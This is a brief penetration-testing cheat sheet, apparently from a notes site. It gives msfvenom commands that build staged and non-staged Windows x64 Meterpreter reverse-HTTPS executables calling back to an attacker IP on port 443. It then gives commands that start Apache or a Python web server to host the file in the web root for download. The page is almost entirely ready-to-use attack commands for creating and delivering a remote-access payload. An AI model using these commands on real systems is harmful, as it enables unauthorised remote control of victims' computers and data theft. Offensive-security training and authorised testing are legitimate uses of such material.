Payload

msfvenom

nonstaged payload

sudo msfvenom -p windows/x64/meterpreter_reverse_https LHOST=<attacker IP> LPORT=443 -f exe -o /var/www/html/testing.exe

staged payload

sudo msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<attacker IP> LPORT=443 -f exe -o /var/www/html/testing.exe

Note:

run the web server

sudo systemctl start apache2

or

python3 -m http.server 80

Last updated